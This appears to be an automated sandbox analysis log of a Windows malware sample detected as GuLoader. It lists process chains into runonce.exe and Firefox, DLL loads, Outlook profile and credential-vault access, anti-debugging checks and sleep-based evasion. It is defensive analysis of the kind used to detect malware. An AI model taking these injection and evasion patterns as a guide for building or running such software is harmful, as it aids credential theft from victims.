        Source: ulACwpUCSU.exeVirustotal: Detection: 35%
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile read: C:\Users\user\Desktop\ulACwpUCSU.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ulACwpUCSU.exe "C:\Users\user\Desktop\ulACwpUCSU.exe"
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess created: C:\Users\user\Desktop\ulACwpUCSU.exe "C:\Users\user\Desktop\ulACwpUCSU.exe"
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
        Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess created: C:\Users\user\Desktop\ulACwpUCSU.exe "C:\Users\user\Desktop\ulACwpUCSU.exe"Jump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Lumbagoen.lnk.0.drLNK file: ..\..\..\..\Windows\system32\scups\deployerende.emb
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: ulACwpUCSU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: runonce.pdbGCTL source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: ulACwpUCSU.exe, 00000003.00000003.2919856507.0000000037365000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: ulACwpUCSU.exe, ulACwpUCSU.exe, 00000003.00000003.2919856507.0000000037365000.00000004.00000020.00020000.00000000.sdmp, runonce.exe
        Source: Binary string: mshtml.pdbUGP source: ulACwpUCSU.exe, 00000003.00000001.2708155716.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: runonce.pdb source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.2885919945.0000000005AF5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406061
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_10002D30 push eax; ret 0_2_10002D5E
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050521AD pushad ; retf 0004h5_2_0505223F
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050808CD push ecx; mov dword ptr [esp], ecx5_2_050808D6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050597A1 push es; iretd 5_2_050597A8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0311029B push edi; retf 5_2_031102A8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_031101B5 push esi; ret 5_2_031101B6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_031047E8 push ebp; ret 5_2_031047E9
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03104877 pushfd ; iretd 5_2_03104878
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030F4DED pushad ; iretd 5_2_030F4DF0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0310AC5E pushad ; ret 5_2_0310AC6D
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0310ACEF push cs; iretd 5_2_0310ACF4
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03105229 push es; retf DC53h5_2_03105242
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030F518D push ds; ret 5_2_030F518E
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FD010 push esi; iretd 5_2_030FD0FD
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030F3E88 push cs; ret 5_2_030F3E89
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile created: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 rdtsc 3_2_37731763
        Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 9094Jump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\runonce.exeAPI coverage: 2.7 %
        Source: C:\Windows\SysWOW64\runonce.exe TID: 6328Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\runonce.exe TID: 6328Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exe TID: 6328Thread sleep count: 9094 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\runonce.exe TID: 6328Thread sleep time: -18188000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe TID: 2272Thread sleep time: -95000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe TID: 2272Thread sleep time: -67500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe TID: 2272Thread sleep time: -53000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_0040603A FindFirstFileA,FindClose,0_2_0040603A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055F6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0310BA90 FindFirstFileW,FindNextFileW,FindClose,5_2_0310BA90
        Source: ulACwpUCSU.exe, 00000003.00000003.2920946844.0000000007558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeAPI call chain: ExitProcess graph end nodegraph_0-4300
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeAPI call chain: ExitProcess graph end nodegraph_0-4306
        Source: C:\Windows\SysWOW64\runonce.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\runonce.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 rdtsc 3_2_37731763
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377334E0 NtCreateMutant,LdrInitializeThunk,3_2_377334E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406061
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37720774 mov eax, dword ptr fs:[00000030h]3_2_37720774
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37702760 mov ecx, dword ptr fs:[00000030h]3_2_37702760
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 mov eax, dword ptr fs:[00000030h]3_2_37731763
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 mov eax, dword ptr fs:[00000030h]3_2_37731763
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 mov eax, dword ptr fs:[00000030h]3_2_37731763
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 mov eax, dword ptr fs:[00000030h]3_2_37731763
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 mov eax, dword ptr fs:[00000030h]3_2_37731763
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37731763 mov eax, dword ptr fs:[00000030h]3_2_37731763
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F4779 mov eax, dword ptr fs:[00000030h]3_2_376F4779
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F4779 mov eax, dword ptr fs:[00000030h]3_2_376F4779
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A750 mov eax, dword ptr fs:[00000030h]3_2_3772A750
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37712755 mov eax, dword ptr fs:[00000030h]3_2_37712755
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37712755 mov eax, dword ptr fs:[00000030h]3_2_37712755
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37712755 mov eax, dword ptr fs:[00000030h]3_2_37712755
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37712755 mov ecx, dword ptr fs:[00000030h]3_2_37712755
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37712755 mov eax, dword ptr fs:[00000030h]3_2_37712755
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37712755 mov eax, dword ptr fs:[00000030h]3_2_37712755
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779E750 mov eax, dword ptr fs:[00000030h]3_2_3779E750
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37723740 mov eax, dword ptr fs:[00000030h]3_2_37723740
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF75B mov eax, dword ptr fs:[00000030h]3_2_376EF75B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772174A mov eax, dword ptr fs:[00000030h]3_2_3772174A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777174B mov eax, dword ptr fs:[00000030h]3_2_3777174B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777174B mov ecx, dword ptr fs:[00000030h]3_2_3777174B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37719723 mov eax, dword ptr fs:[00000030h]3_2_37719723
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB705 mov eax, dword ptr fs:[00000030h]3_2_376EB705
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB705 mov eax, dword ptr fs:[00000030h]3_2_376EB705
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB705 mov eax, dword ptr fs:[00000030h]3_2_376EB705
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB705 mov eax, dword ptr fs:[00000030h]3_2_376EB705
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF717 mov eax, dword ptr fs:[00000030h]3_2_377AF717
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD700 mov ecx, dword ptr fs:[00000030h]3_2_376FD700
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B970B mov eax, dword ptr fs:[00000030h]3_2_377B970B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B970B mov eax, dword ptr fs:[00000030h]3_2_377B970B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F471B mov eax, dword ptr fs:[00000030h]3_2_376F471B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F471B mov eax, dword ptr fs:[00000030h]3_2_376F471B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771270D mov eax, dword ptr fs:[00000030h]3_2_3771270D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771270D mov eax, dword ptr fs:[00000030h]3_2_3771270D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771270D mov eax, dword ptr fs:[00000030h]3_2_3771270D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F37E4 mov eax, dword ptr fs:[00000030h]3_2_376F37E4
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F37E4 mov eax, dword ptr fs:[00000030h]3_2_376F37E4
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F37E4 mov eax, dword ptr fs:[00000030h]3_2_376F37E4
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F37E4 mov eax, dword ptr fs:[00000030h]3_2_376F37E4
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F37E4 mov eax, dword ptr fs:[00000030h]3_2_376F37E4
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F37E4 mov eax, dword ptr fs:[00000030h]3_2_376F37E4
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F37E4 mov eax, dword ptr fs:[00000030h]3_2_376F37E4
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771E7E0 mov eax, dword ptr fs:[00000030h]3_2_3771E7E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F77F9 mov eax, dword ptr fs:[00000030h]3_2_376F77F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F77F9 mov eax, dword ptr fs:[00000030h]3_2_376F77F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF7CF mov eax, dword ptr fs:[00000030h]3_2_377AF7CF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C17BC mov eax, dword ptr fs:[00000030h]3_2_377C17BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F07A7 mov eax, dword ptr fs:[00000030h]3_2_376F07A7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BD7A7 mov eax, dword ptr fs:[00000030h]3_2_377BD7A7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BD7A7 mov eax, dword ptr fs:[00000030h]3_2_377BD7A7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BD7A7 mov eax, dword ptr fs:[00000030h]3_2_377BD7A7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37721796 mov eax, dword ptr fs:[00000030h]3_2_37721796
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37721796 mov eax, dword ptr fs:[00000030h]3_2_37721796
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E79D mov eax, dword ptr fs:[00000030h]3_2_3776E79D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB781 mov eax, dword ptr fs:[00000030h]3_2_377CB781
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB781 mov eax, dword ptr fs:[00000030h]3_2_377CB781
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732670 mov eax, dword ptr fs:[00000030h]3_2_37732670
